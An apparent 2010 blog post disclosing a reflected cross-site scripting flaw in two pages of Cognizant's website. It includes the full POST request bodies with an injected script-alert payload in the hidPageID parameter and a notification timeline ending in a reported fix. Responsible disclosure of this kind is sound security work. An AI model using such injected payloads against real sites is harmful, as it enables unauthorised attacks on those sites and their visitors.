Sunday, June 13, 2010

Cognizant vulnerable to Cross-Site Scripting (XSS)

+++About Cognizant+++
We help transform core processes for greater flexibility, higher efficiency and lower costs.

+++Affected URL(s)+++

-> Case Studies
-> White Papers

+++Vulnerable Parameter / Function+++


POST Request
-> Case studies
hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=casestudy&hidYear=&hidPageTitle=Case+Studies&hidNavigatingFrom=Insights&hidPageNumber=1

-> White Papers
global_office=%2Fhtml%2Fhome.asp&hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=bluepaper&hidYear=&hidPageTitle=White+Papers&hidNavigatingFrom=Insights&selFilterCriteria=All+white+papers&hidPageNumber=3

Cognizant Ist Notified: February 23, 2010
                IInd Notification: March 29, 2010
Response Received: March 30, 2010
Current Status: Fixed (As of today, June 13, 2010)

Thanks to Nikhilesh Jasuja @Cognizant for his quick response on resolving this issue.

Best Regards.

No comments:

Post a Comment


The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.